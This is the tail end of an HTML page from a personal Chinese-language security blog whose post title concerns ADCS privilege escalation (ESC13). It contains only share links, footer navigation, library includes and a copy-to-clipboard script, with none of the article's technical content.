  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://cer3s-k.github.io/post/48e6280e.html&name=滥用ADCS进行权限提升——ESC13详解&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://cer3s-k.github.io/post/48e6280e.html&t=滥用ADCS进行权限提升——ESC13详解"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Cer3s
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/Cer3s-k">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
